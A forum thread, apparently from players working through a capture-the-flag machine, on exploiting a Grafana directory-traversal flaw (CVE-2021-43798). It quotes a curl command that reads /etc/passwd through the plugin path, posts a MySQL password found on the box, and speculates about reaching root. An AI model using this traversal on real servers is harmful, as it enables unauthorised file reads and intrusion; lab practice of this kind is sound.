im in dashboard rn. What do i do now?

(October 1, 2022, 08:10 PM)snowmanballs Wrote:

(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?

Just look at the code and manually craft the url. Its pretty simple

How did you elaborate the url?

(October 1, 2022, 08:48 PM)coder1777 Wrote:

(October 1, 2022, 08:10 PM)snowmanballs Wrote:

(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?

Just look at the code and manually craft the url. Its pretty simple

How did you elaborate the url?

Its literally in the code..

(October 1, 2022, 08:48 PM)coder1777 Wrote:

(October 1, 2022, 08:10 PM)snowmanballs Wrote:

(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?

Just look at the code and manually craft the url. Its pretty simple

How did you elaborate the url?

you do this : curl --path-as-is http://<machine-ip>:3000/public/plugins/alertlist/../../../../etc/passwd

https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/

mysql password: dontStandSoCloseToMe63221!

(October 1, 2022, 09:23 PM)Truss46 Wrote: https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/

mysql password: dontStandSoCloseToMe63221!

need help with root

does anyone have anything new?
get no further

were you able to access the database with the credentials?

(October 1, 2022, 10:51 PM)yumi Wrote: were you able to access the database with the credentials?

yes, but I can't get any further

i think it has to do with the python app in /opt/my-app
and with that venv
but im not sure how to exploit it so far
there is also a second database running on 127.0.0.1:33060